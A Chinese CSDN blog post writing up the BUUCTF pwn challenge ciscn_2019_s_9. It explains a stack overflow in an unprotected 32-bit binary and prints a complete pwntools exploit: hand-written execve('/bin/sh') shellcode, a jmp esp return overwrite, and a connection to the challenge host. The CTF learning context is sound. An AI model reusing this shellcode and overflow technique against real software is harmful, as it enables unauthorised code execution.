[BUUCTF] ciscn_2019_s_9

最新推荐文章于 2024-05-23 09:36:38 发布
最新推荐文章于 2024-05-23 09:36:38 发布
阅读量221 收藏 1
点赞数
分类专栏: shellcode刷题合集 BUUCTF_Pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zyxx_wjc/article/details/125710088
版权

一道好玩的shellcode题,先checksec一下发现啥都没开,甚至NX也没开,目测是写在栈上的shellcode。

扔进ida里面,主要就pwn和hint两个函数比较重要,main函数直接调用了pwn,pwn函数里面有一个栈溢出漏洞。这个溢出长度不是很长,由于last ebp和返回地址在我们能填充的范围中间,pwntools自带的shellcode是写不开的(印象里是写不开的),需要我们自己去写一个shellcode。

hint函数里面是一个asm,点开汇编发现有一个jmp esp,这个就很有用。

我们自己写的shellcode长度是0x14个字节,这个长度是可以放在last ebp之前的。接下来我们可以修改返回地址为jmp esp,当这条指令的地址被弹出是,esp会下移四个字节(+4),因此我们在构造payload的时候在返回地址后面加上一个sub esp 0x28让esp指针升高指向shellcode起始处,再加上一句jmp esp执行shellcode。

0x28这个值可以由gdb中直观的数据计算得到,当然脑力够用的话也是可以静态分析出来。

shellcode的写法在我之前的博客[BUUCTF]刷题:pwnable_start_Jmp.Cliff的博客-CSDN博客有所提到。

 

 之后轻易拿到shell

exp如下:

from pwn import *

context.terminal=['tmux','splitw','-h']
context.arch='i386'

r=remote('node4.buuoj.cn',26547)
#r=process('/home/wjc/Desktop/ciscn_s_9')

shellcode=asm('\
                 xor ecx,ecx;\
                 xor edx,edx;\
                 push 0x0068732f;\
                 push 0x6e69622f;\
                 mov ebx,esp;\
                 mov al,0xb;\
                 int 0x80;\
                 ')

print(hex(len(shellcode)))

jmp_esp=0x08048554

payload=shellcode.ljust(0x20,'\x00')+4*'b'+p32(jmp_esp)+asm('sub esp,0x28;jmp esp;')

#gdb.attach(r,'b*0x08048531')

r.sendline(payload)

r.interactive()

 

Jmp.Cliff
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
[buuctf]ciscn_2019_s_9
逆向萌新的博客
07-15 988
[buuctf]ciscn_2019_s_9
ciscn_2019_s_9
K1ose的博客
04-22 796
下载附件,file一下,是32bit程序; checksec一下; 基本没保护措施; IDA里分析一波; main()跳到pwn(); 看看pwn()的内容; 看到fgets立马想到栈溢出; 又注意到有一个hint()函数; 其内容如下: 这里直接跳到了$esp,$esp是在堆栈上的; 既然有栈溢出,栈可执行,又有一个跳转到$esp的函数,思路就很清晰了; 我们先利用栈溢出,覆盖pwn()函数的返回地址为jmp esp的地址,然后我们再使得$esp指向shellcode所在的地址,完美! 但是因为
[BUUCTF]PWN——ciscn_2019_s_9
BangSen1的博客
04-26 497
ciscn_2019_s_9 参考 例行检查 ,32位,未开启任何保护 运行一下。 32位ida载入,,第10行的fgets,能够溢出0x32-0x20-0x4个字节 没用nx保护,首先想到的就是往s里写入shellcode,然后跳转到s执行shellcode 生成的shellcode的长度过长,参数 s0x20(32) 写不下。 shellcode =''' xor eax,eax #eax置0 xor edx,edx #edx置0 push edx #将0入栈,标
[BUUCTF]PWN——ciscn_2019_s_9(汇编代码写shellcode)
mcmuyanga的博客
01-28 1466
ciscn_2019_s_9 附件 步骤 例行检查,32位程序,没用开启任何保护 本地试运行看一下程序大概的情况 32位ida载入,第10行的fgets,能够溢出0x32-0x20-0x4个字节 由于没用nx保护,首先想到的就是往s里写入shellcode,然后跳转到s执行shellcode,s在栈上,ida里有一个函数,为我们提供了跳转到栈上的指令jmp esp 现在就一个问题,s大小只有0x20,用下面的shellcode不懂能不能完全写入 context(log_level = 'debu
BUUCTF之“ciscn_2019_s_9”见32位shellcode的简单写法,以及其中的难解之处
Probeginner的博客
12-09 238
32位简单shellcode
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF逆向前八题
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF】web之强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: ...
BUUCTF PWN ciscn_2019_s_9
Rt1Text的博客
04-22 231
1.checksec+运行 32位/没有保护 2.32IDA进行中 1.hint函数 提示函数,很有帮助,解题关键点 直接跳到esp栈顶指针 2.pwn函数 明显的fgets()函数溢出 跟进s看看偏移 offset = 0x20+4 向s里写入shellcode 注意一点: 如果直接用pwntools生成的shellcode,会很长,s里写不下 所以这就需要我们优化shellcode的长度 shellcode =''' xor eax,eax ..
ciscn_2019_s_9详解
勿山几已
06-12 294
详解pwn入门题ciscn_2019_s_9
初学pwn-BUUCTF(ciscn_2019_n_1)
天柱的博客
08-31 568
初学pwn-writeUp BUUCTF的第四道题,ciscn-2019_n_1。 首先还是链接远端查看一下。 这里提示让猜一个数字,然后他告诉我们,这个数字应该是11.28125。这就有点掩耳盗铃了呀,但是输入了11.28125,还是在说应该输入11.28125。可能是有点问题,ida打开查看一下。 可以看到主函数里,调用了三个函数,前两个都是set某个值,我们直接看func函数。 那这就很明显了,刚刚输入的值赋给了v1,但是这里是要让v2的值等于11.28125才可以。查看一下地址。 嗯,跟想象
[BUUCTF]PWN6——ciscn_2019_c_1
mcmuyanga的博客
08-25 6606
[BUUCTF]PWN6——ciscn_2019_c_1 题目网址:https://buuoj.cn/challenges#ciscn_2019_c_1 步骤: 例行检查,64位,开启了nx保护 nc一下,看看输入点的字符串,三个选项加密、解密、退出 用64位ida打开,先是shift+f12查看一下程序里的字符串 没有发现system函数和字符串“bin/sh”,先根据输入点的字符串查看一下主要函数 就像一开始说的程序的功能就是加密和解密,看伪代码可以知道,只有选1的时候才会调用encrypt()
等保测评-安全通信网络与安全区域边界
2403_84237550的博客
05-23 678
等保测评,全称为网络安全等级保护测评,是中国网络安全领域的一项重要工作,旨在通过标准化的测评流程,确保信息系统的安全等级保护措施符合国家相关标准。在等保测评中,"安全通信网络"与"安全区域边界"是两个关键的测评领域。
安全警钟】APP如何筑起坚不可摧的防御,抵御黑客攻击?
NSME1的博客
05-20 516
做好安全防御
什么样的数据摆渡设备,可以满足不同网间数据的安全传输需求?
最新发布
文件数据安全交换
05-23 353
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。专业的跨网文件交换平台:比如飞驰云联《Ftrans Ferry跨网文件安全交换系统》:提供企业文件交换、病毒查杀、文件内容检测、审核审批、权限管控、日志审计等功能,实现安全、高效、可靠、便捷的文件交换。同时支持会签、或签,支持转审,可设置抄送人。
buuctf luky_guy
09-28
Luky库是一组抽象复杂操作的Java类,它提供了各种功能,包括网络操作,事件处理,加密,数据库处理,snmp监视,队列,信号量,解析器和XML处理程序等。根据提供的引用内容,无法直接了解到buuctf luky_guy的具体信息。如果您能提供更多关于buuctf luky_guy的背景信息,我可以尝试为您提供更准确的答案。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值